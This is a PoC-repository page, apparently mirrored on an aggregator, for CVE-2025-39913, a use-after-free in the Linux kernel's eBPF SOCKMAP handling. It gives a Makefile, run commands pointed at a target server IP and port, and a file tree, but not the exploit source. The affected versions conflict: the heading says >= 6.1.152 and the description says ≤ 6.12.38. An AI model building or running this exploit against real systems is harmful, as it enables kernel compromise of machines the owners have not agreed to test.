来源

关联漏洞

描述

UAF in linux kernel >= 6.1.152 (psock->cork) 

介绍

# CVE-2025-39913  - Linux Kernel eBPF SOCKMAP (UAF)
**Author: Byte Reaper**

**My platform : https://www.bytrep.com/**
## Description
- This repository contains a technical proof-of-concept for CVE-2025-39913, a vulnerability in the Linux kernel's tcp_bpf_send_verdict() function. When bpf_msg_cork_bytes() fails to allocate psock->cork, the kernel may skip freeing sk_msg, leading to memory mismanagement. This can result in memory leaks or potential use-after-free (UAF) conditions under specific eBPF sk_msg operations.

Affects Linux kernel versions ≤ 6.12.38 with SOCKMAP support.


## Requirements :
```
Kernel ≤ 6.12.38
Linux x86_64
GCC
```

## Build :
```
	1 - Create Makefile : 

        # touch Makefile

    2 - Paste the content into the Makfile :  

        TARGET := CVE-2025-39913

        KERNEL_PATH := /usr/src/linux-headers-$(shell uname -r)

        BPF_OBJ := bpf_injection.o

        USER_SRCS := main.c load_bpf.c check_bpfELf.c pingCheck.c com_c.c exit_asm.c sockmap_link.c check_elf.c result.c argparse.c

        USER_OBJS := $(USER_SRCS:.c=.o)
        ALL_OBJS := $(USER_OBJS) $(BPF_OBJ)

        LIBS := -l:libbpf.a -lrt -lelf -lz 

        $(TARGET): $(ALL_OBJS)
            gcc $(USER_OBJS) -o $@ $(LIBS) 
        %.o: %.c
            gcc -c $< -o $@

        $(BPF_OBJ): bpf_injection.c
            clang -O2 -target bpf -c $< -o $@ \
                -nostdinc \
                -I/usr/lib/clang/19/include \
                -I$(KERNEL_PATH)/arch/x86/include \
                -I$(KERNEL_PATH)/arch/x86/include/generated \
                -I$(KERNEL_PATH)/include \
                -I$(KERNEL_PATH)/include/uapi \
                -I$(KERNEL_PATH)/include/generated/uapi \
                -I$(KERNEL_PATH)/include/asm-generic \
                -I/usr/include

        clean:
```
## Run :
```
	 1 - IP address :
     # ./CVE-2025-39913 -i [server-ip] 

    2 - target port (default : 80) :
     # ./CVE-2025-39913 -i [server-ip] -p [PORT]

    3 - Full ARG : 
     # ./CVE-2025-39913 -h

    4 - Check Obj file BPF :
     # ./CVE-2025-39913 -i [server-ip] -p [PORT] -o 

    5 - Check debug tracing : 
     # ./CVE-2025-39913 -i [server-ip] -p [PORT] -c
```

## References

- **Linux BPF TCP** – <https://docs.kernel.org/networking/filter.html>
- **bpf.h** – <https://codebrowser.dev/linux/include/linux/bpf.h.html>
- **NVD (CVE-2025-39913)** – <https://nvd.nist.gov/vuln/detail/CVE-2025-39913>
- **Create SOCKMAP** – <https://docs.kernel.org/bpf/map_sockmap.html>
- **POC** – <https://bytrep.com/exploit39913.html>
## Observation : 
- This is an exploitation taken from the platform https://bytrep.com/

## License : 

MIT

文件快照

 [4.0K]  /data/pocs/5429d7cd38e2884c5063487fefb83235b7f5b6fb
├── [1.0K]  LICENSE
├── [2.7K]  README.md
└── [4.0K]  src
    ├── [  73]  asm_exit.h
    ├── [3.0K]  bpf_injection.c
    ├── [ 145]  bpfO.h
    ├── [2.9K]  check_bpfELf.c
    ├── [ 20K]  check_elf.c
    ├── [6.7K]  com_c.c
    ├── [  75]  com_c.h
    ├── [1.1K]  exit_asm.c
    ├── [1.8K]  load_bpf.c
    ├── [ 108]  load_bpf.h
    ├── [7.2K]  main.c
    ├── [1008]  Makefile
    ├── [ 108]  map_check.h
    ├── [  84]  pingC.h
    ├── [3.5K]  pingCheck.c
    ├── [3.9K]  result.c
    ├── [ 221]  sockmapBuild.h
    └── [ 13K]  sockmap_link.c

1 directory, 20 files

备注